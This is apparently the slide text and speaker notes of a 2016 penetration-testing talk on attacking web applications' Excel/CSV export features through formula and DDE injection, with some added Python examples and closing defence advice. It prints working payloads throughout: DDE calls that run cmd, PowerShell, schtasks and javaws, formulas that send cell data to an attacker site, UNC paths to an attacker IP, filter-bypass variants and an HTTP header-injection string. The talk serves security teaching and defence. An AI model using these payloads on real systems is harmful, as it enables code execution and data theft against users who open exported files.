This presentation is an embellished version of the second half of a talk originally presented at BSides MCR 2016. It covers more general web app export issues as well as revisions on the DDE content following feedback from BSides. This talk also had more demos. Video at https://www.youtube.com/watch?v=3wNvxRCJLQQ.
CamSec Sept 2016 - Tricks to improve web app excel export attacks
1. Tricks to Improve Web App Excel Export Attacks
Jerome Smith
CamSec September 2016
2. whoami
• In computer security for y years
• Pentester for p years
• At NCC Group for n years
• Where y 2p and p 2n and 2n + 5 y
• CREST CCT (App)
• Presented at BSides Manchester 2014 and 2016
• exploresecurity.com && @exploresecurity
3. By way of an agenda
1. Web application Excel export
2. What to look out for
3. The DDE trick
4. Can we improve the attack?
4. Web application Excel export
• Users submit data to application
• Data is stored
• Elsewhere that data can be exported in Excel format
• CSV
• XLS
• XLSX
• User has at least some control over the contents
• Usually there’s a “template” with certain cells filled with user input
• That’s where things get interesting
• Wacky variations
• e.g. data to be exported was sent to client in a form and POSTed back!
6. Some things to look out for
• Force format (more on this later)
f=xls → f=csv or app/export/xls/ → app/export/csv/
• Unauthenticated access
• Content-Type incorrect, esp. text/html → XSS?
• Unless Content-Disposition: attachment is present
• Header injection
f=csv"%0d%0aSet-Cookie:%20AUTH%3dABCDEF0123456789%0d%0aX:%20%22
Content-Disposition: attachment; filename="Year2016.csv"
Set-Cookie: AUTH=ABCDEF0123456789
X: ""
• Usefulness of Set-Cookie depends on other factors
• Cache-control directive
• Caching depends on content, context and browser
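The header injection above, reproduced as an added example (not code from the talk): a "before" builder that pastes the f= parameter straight into Content-Disposition, beside a whitelisted "after" that also refuses CR/LF. The filename stem Year2016 and the allowed-format set are assumptions; real frameworks usually reject CR/LF in header values themselves, which the "before" deliberately models not doing.

```python
from urllib.parse import unquote

ALLOWED_FORMATS = {"csv", "xls", "xlsx"}  # assumed whitelist of export formats

# Constructed from the slide: the f= parameter with CRLF sequences,
# URL-decoded as the server would see it.
INJECTED_FORMAT = unquote(
    'csv"%0d%0aSet-Cookie:%20AUTH%3dABCDEF0123456789%0d%0aX:%20%22'
)


def vulnerable_headers(fmt):
    """'Before': user-controlled format pasted straight into the header."""
    return [("Content-Disposition", f'attachment; filename="Year2016.{fmt}"')]


def hardened_headers(fmt):
    """'After': whitelist the format, and refuse a header value containing
    CR or LF in case anything else ever slips through."""
    if fmt not in ALLOWED_FORMATS:
        raise ValueError("unsupported export format")
    value = f'attachment; filename="Year2016.{fmt}"'
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return [("Content-Disposition", value)]


def rejects(fmt):
    """True if the hardened builder refuses this format value."""
    try:
        hardened_headers(fmt)
    except ValueError:
        return True
    return False


def header_lines(headers):
    """Serialise as a raw header block and split it the way a client parses
    it, so an injected CRLF shows up as extra header lines."""
    raw = "".join(f"{name}: {value}\r\n" for name, value in headers)
    return [line for line in raw.split("\r\n") if line]
```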
7. The DDE trick
• Dynamic Data Exchange (DDE) is an old Microsoft technology
• Facilitates data transfer between applications
• A form of Inter-Process Communication (IPC)
• Security risks of Excel export first widely publicised 2014 by @albinowax
http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
• Consider a spreadsheet cell:
=cmd|'/c calc'!A0
service | topic ! item
• How about
• cmd /c \\<attacker_IP>\evil$\malware.exe
• cmd /c net use \\<attacker_IP>\c$
• An ISP should block outbound SMB ports
9. Users and warnings – Piranha
(chart: 44%, 70% and 75% of users clicked through the warnings)
10. Source of warnings
• Setting is a property of the file
• Only effective if file has been trusted previously
• Two stage attack (low and slow)?
• Benign payload =NotASheet!A1
• Malicious payload
11. Trusted Documents
(screenshots of warnings (1) and (2a))
Only the filename is stored
Downloads with static filenames are of interest
Once “trusted”, if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed
12. Excel file format
XLSX vs XLS vs CSV
• Sometimes user can influence format, recall f=xls → f=csv
• CSV: no Protected View warning
• CSV: can’t contain start-up prompt auto-update setting
CSV format in XLS file
• Less likely outcome – one of those wacky variations!
• Format warning instead of Protected View warning
• Formal security warnings (1) and (2a) not shown
• Therefore the file cannot be “trusted” in the registry
• Curiously, comma-delimited CSV content is not supported here: only tab or CRLF cell delimiters work
13. That CMD.EXE warning
Built-in Excel functions
• Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here")
• Limited info about the system, e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE")
• =WEBSERVICE(URL)
• Sadly doesn’t support authentication (i.e. force NTLM authentication)
• Or file paths (local or UNC) or file://
• But it will steal data without user interaction (unlike HYPERLINK)
=WEBSERVICE("http://myevilsite.com/?data="&A1)
• =FILTERXML(XML, XPATH)
• Any XXE or parsing bugs?
14. Alternatives to cmd.exe
• =powershell|'Test-Connection 127.0.0.1'!A0
Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula
=cmd|'/k powershell Test-Connection 127.0.0.1'!A0
• PATHEXT environment variable ignored – .exe only
• .exe files in PATH where filename <= 12 characters
=explorer|'https://nccgroup.trust'!A0
=schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0
=javaws|'http://myevilsite.com/malware.jnlp'!A0
=rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0
• N.B. if Excel is 32-bit, then the program will be run as such, etc.
16. Native DDE services – 2/2
Progman
• dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]}
Folders (=Shell?)
• dde execute Folders AppProperties {[ViewFolder("","\\attacker_IP\c$",2)]}
What about in Excel?
• This could save you hours: when testing, if Excel hangs, try closing Tcl
• =Folders|AppProperties!'{[ViewFolder("","c:\windows",1)]}'
• That Tcl service-topic list isn’t complete…
17. DDESpy
• Part of Visual Studio 6 (!)
• Must be running when application launches
18. iexplore DDE
• =iexplore|WWW_OpenURL!exploresecurity.com
• No (3) “remote data not accessible” warning
• Slice of BeEF anyone?
• =iexplore|WWW_OpenURL!'\\<attacker_IP>\c$'
• =iexplore|WWW_OpenURL!'c:\windows\system32\cmd.exe'
• No better than where we were really!
• No obvious way to include switches anyway – a limitation of file://
20. Demo
(1) No Protective View warning as CSV
(2) Just “Enable Content” warning as DDE call succeeded
• Background navigation to phishing site could be very effective
(3) No warnings – exactly which stars were aligned there?!
• A file with same name previously downloaded
• Had content to elicit warnings, which were accepted
• So it’s now “trusted”
• Previous file need not have been malicious – remember
=NotASheet!A1
• Malicious file’s start-up prompt set to auto-update links
21. Bypassing filters
• Original article stated: prefix cells starting with = with '
• This will “cast” the cell as text in XLS[X] and stop execution in CSV
• We know better now
• Imagine the blacklist ^=[A-Za-z].*
• How about:
+cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0
=cmd|'/k ipconfig'!A0
@SUM(cmd|'/k ipconfig'!A0)
"=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0
=(cmd|'/k ipconfig'!A0)
=0-cmd|'/k ipconfig'!A0
22. Lessons
• Check out any Excel export that returns user-supplied data
• CSV is not a benign format
• DDE ≠ macro
• Input validation blacklists may not be robust
• Much of this stuff applies to red-teaming
• Excel documents as email attachments
• In some cases it may be possible to cut down the Excel warnings
• Excel may have more to give in this area
• The old stuff often comes back to bite us!
• Work in progress – do explore...
23. Where now?
• Enumerate DDE surface area – services + topics + items
• Poorly documented
• iexplore c:\Windows\System32\ieframe.dll
• firefox c:\Program Files (x86)\Mozilla Firefox\xul.dll
• Progman/Shell/Folders c:\Windows\System32\shell32.dll
• Progman/Shell/Folders attractive as they’re always running
• But are they exploitable via Excel?
• dde execute Folders AppProperties {[ViewFolder("","c:\windows",1)]}
• =Folders|AppProperties!'{[ViewFolder("","c:\windows",1)]}'
• =iexplore|WWW_OpenURL!'exploresecurity.com?a={[ViewFolder("","c:\windows",1)]}' → http://www.exploresecurity.com/?a=ViewFolder
• =firefox|WWW_OpenURL!'http://exploresecurity.com?a={[ViewFolder("","c:\windows",1)]}' → http://exploresecurity.com/?a={[ViewFolder(
• =cmd|'/k echo {[ViewFolder("","c:\windows",1)]}'!A0 → {[ViewFolder("","c:\windows",1)]}
25. Defence
• Blacklists can be difficult to get right – this should not be a new lesson!
• Validation against a strict whitelist of “known good” should always be the go-to defensive strategy
• Consider length, character types, format
• Otherwise e.g. for XLS[X] consider always prefixing user input with '
• This may break some numerical operations on those cells, but if you’re expecting a number then see above!
• Trouble with ' for CSV is that it’s visible
• If you have to use a blacklist, don’t be too strict
• In the vast majority of cases, “normal” input still won’t match, e.g. (and I hate to do it but people have asked)
^\W.+\|.+!.+ // DDE
^\W.+\(.+\) // formulae
Use at your own risk and they’ll probably change one day!
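As an added example (not code from the talk), a Python export sanitiser that covers both the bypass list on slide 21 and the defence advice on slide 25: it shows the naive ^=[A-Za-z].* blacklist missing all but one of the bypass variants, the talk's looser DDE pattern (regex escaping restored) catching them all, and the ' prefix applied behind a numeric whitelist when writing CSV. The NUMBER regex and the per-column whitelist layout are my assumptions.

```python
import csv
import io
import re

# Constructed test set: the filter-bypass variants from slide 21.
BYPASS_PAYLOADS = [
    "=cmd|'/k ipconfig'!A0",
    "+cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0",
    "@SUM(cmd|'/k ipconfig'!A0)",
    "\"=cmd|'/k ipconfig'!A0\"",
    "=(cmd|'/k ipconfig'!A0)",
    "=0-cmd|'/k ipconfig'!A0",
]

NAIVE_BLACKLIST = re.compile(r"^=[A-Za-z].*")  # the strawman from slide 21
DDE_BLACKLIST = re.compile(r"^\W.+\|.+!.+")     # slide 25's DDE pattern
NUMBER = re.compile(r"^-?\d+(\.\d+)?$")         # assumed numeric whitelist

# Leading characters that make Excel evaluate a cell, plus the two
# delimiters that would end the cell early inside a CSV value.
TRIGGER_CHARS = ("=", "+", "-", "@", "\t", "\r")

def is_flagged(value, pattern):
    """Would this blacklist regex reject the value?"""
    return pattern.search(value) is not None

def neutralise_cell(value):
    """Force Excel to treat the cell as text (the ' prefix from slide 25)."""
    value = value.replace("\r", " ").replace("\t", " ")
    # Look past leading quotes so the "=cmd... variant is caught too.
    if value.lstrip('"').startswith(TRIGGER_CHARS):
        return "'" + value
    return value

def export_csv(rows, numeric_columns=()):
    """Whitelist-first: numeric columns keep known-good numbers as-is,
    every other cell goes through neutralise_cell()."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    for row in rows:
        out = []
        for col, cell in enumerate(row):
            cell = str(cell)
            if col in numeric_columns and NUMBER.match(cell):
                out.append(cell)
            else:
                out.append(neutralise_cell(cell))
        writer.writerow(out)
    return buf.getvalue()
```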
See next slide, but also…
HTTP
y param possibly reflected back – header and body
“Jerome” presumably manipulable (profile first name etc.)
Header disclosure
ASP.NET 4.0 unsupported
Format change – especially if using libraries, unintended functions supported
Incorrect content-type could yield XSS but spoiled by Content-Disposition
Cache-control
Report may include sensitive data
May not be cached due to other headers like Content-Disposition (without this Content-Type plays a role – in this case it would be cached due to text/html but application/vnd.ms-excel for .xls or application/vnd.openxmlformats-officedocument.spreadsheetml.sheet for xlsx less certain – browser-dependent)
Even apps that have good caching headers can fall down on file download (these requests not processed in same way, e.g. it’s a static file returned by server)
James Kettle, PortSwigger
DDE call
Cell reference is not required, could be anything (cells are used when data source is another Excel sheet)
Imagine program=shares topic=LSE item=NCC
It’s because the DDE call fails that Excel offers to run it
Orange/EE definitely blocks outbound 135 and 139 (and probably 25 and 445)
If internal app, those creds immediately valuable
(1) because it’s come from internet location
(2a) first encounter – creates registry entry to be “trusted”
(2b) when trusted but links not auto-updated
(3) because DDE call fails
More warnings may follow after payload launches
Piranha jobs where users had to accept Excel warning(s)
% of users who opened the spreadsheet
Clearly we didn’t know what the user experience was in terms of warnings but the fact there was a difference between opened spreadsheets and macros run shows that some further step must have been necessary
Internal Excel files often contain macros, especially within areas such as finance – users are habituated to the warnings
Or the warnings may have been disabled! This is the macro setting, doesn’t affect us here, but that’s worse!
Only once the Enable Content warning has been accepted does this setting make a difference
=NotASheet!A1 is enough to prompt Enable Content security warning but doesn’t do anything suspicious
Might as well hit them with it at once if they’re accepting the warning
Trust Center
https://support.office.com/en-gb/article/Block-or-unblock-external-content-in-Office-documents-10204ae0-0621-411f-b0d6-575b0847a795
Workbook Links = links to data in another workbook
https://support.microsoft.com/en-us/kb/826921
Part of Trust Center but not visible through the UI
Entry in registry doesn’t require users to save the file
Protected View approval registered immediately
Enable content approval registered once CMD warning answered (can be “no”)
Binary value?
Trusted Locations are default areas, nothing useful without prior access
Attack scenario: user input influences filename or application always names the file the same way
Browsers may be configured to auto-download in which case they will append numbers to stop accidental overwrite
If no filename in Content-Disposition then FF will name file by the page in the URI + an extension based on Content-Type e.g. export.asp.xls so this would produce same filename
Although CSV no PV, the EC warning means it can be trusted in registry
Invalid XLSX not tolerated
Excel 2010 vs 2013 no real difference
URI extension: doesn’t matter if request is for .xls or .asp etc
Content-Type / Content-Disposition filename dominant
But text/csv not recognised so only if URI is .csv will it be opened correctly, otherwise .asp will fail
Document opened inline vs saved & opened from disk
If inline, URI must end CSV, otherwise similar to above
Invalid XLS format (which cell delimiters still work when CSV content is served as .xls):
=cmd|'/k ipconfig'!A3 → okay (single cell)
1 2 3 =cmd|'/k ipconfig'!A3 → okay (tab-delimited)
1 / 2 / 3 / =cmd|'/k ipconfig'!A3 on separate lines → okay (CRLF-delimited)
1,2,3,=cmd|'/k ipconfig'!A3 → not okay (comma-delimited)
Can we get rid of or soften that CMD.EXE warning?
Tried =powershell in Excel 2010 (32-bit), 2013 (32-bit), 2016 (64-bit)
@ZephrFish doesn’t see this (!?) but if it can happen then it’s still something to be wary of
Tilde means next character is a literal e.g. in Find, but can’t be escaped in formula with ~~ or \~ etc ???
Not many files have 8.3 alternative anyway
Find files < 8 chars plus .exe by powershell "cmd /c dir *.exe /b |? {$_.length -lt 13}"
explorer will open default browser
Java Web Start – may be disabled anyway but fun!
Data theft from sheet a little alarming, although something malicious would already have to be running
You can overwrite cells of the spreadsheet that you can’t using the web app injection
Use of Alert vs MsgBox -> XLM macro language in Excel 4.0 before VBA (old help file in reference at end)
Alert also demonstrates multiple statements i.e. [macro 1][macro 2]
Exec didn’t work, nor did fopen
The System topic seems to do same as Sheet but unexplored
Documentation on DDE interfaces poor – Googling so much, Google thought I was a robot!
Progman manipulates shortcuts in Start | All Programs
Screenshot of typing “word” into Start search menu
Can’t delete real Microsoft Word 2010 as link is in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office”
Folders instructs Windows Explorer (Shell seems to mirror Folders)
The “2” minimises the window
Doesn’t accept URL
Clear out DDE channels from Excel
https://social.technet.microsoft.com/Forums/office/en-US/7c8f845d-c4aa-4627-9008-3251d2772536/dde-links-crash-excel-2010-on-windows-7-64bits?forum=excel
Dim i As Integer
On Error Resume Next    ' channel numbers that aren't open raise an error; skip them
For i = 1 To 1000
    Application.DDETerminate i    ' close any DDE channel Excel still holds
Next i
Only works if IE running
Trailing / after domain important
Note that only URL of active tab obtained
WWW_GetWindowInfo doesn’t work in IE
Another reason to keep session tokens etc. out of URLs
Top left picked up – others pass
The @ was originally an alias for = to make life easy for converts from Lotus Notes
SUM could also be COUNT, COS…
Some may only work when in file and opened, not copy & paste, as Excel corrects syntax to make it work!
If something in Tcl doesn’t work in Excel, useless
Syntax of DDE not needed elsewhere?
Is it Excel limitation?...
iexplore/firefox tests
iexplore only chars associated with URLs like : / ? . % passed through (suggests IE filtering DDE input)
Confirmed by difference with Firefox
cmd test everything came through
But that’s not a “real” DDE call
Also special characters in topic here, cf item in iexplore – difference (you’d think item would be more open)?
Image from https://images.template.net/wp-content/uploads/2014/10/Free-brick-wall-texture.jpg
All available textures for free download come under the ambit of Creative Commons Usage
Based on http://www.texturemate.com/content/free-texture-brick-25-05-2014-00005-img0871
Every resource provided on texturemate is considered completely royalty free! The stock textures, texture packs, brush packs, and any other resources available for download on this site are completely free and may be used in commercial or non-commercial applications. Credit to texturemate for use of available textures or brushes is appreciated, but not required
Consider phone number – it may have a + at the front but so structured elsewhere that it can be well protected
Prefixing with ' may break some numerical operations on that cell e.g. SUM but if you’re expecting a number then use whitelist; text functions should still work
Blacklist regex – you asked for it!
Regexes could be combined but harder to match literals | only with ! and ( only with ) – nothing wrong with clarity!
\W (capital) matches non-alphanumeric
Formulae is probably more prone to false positives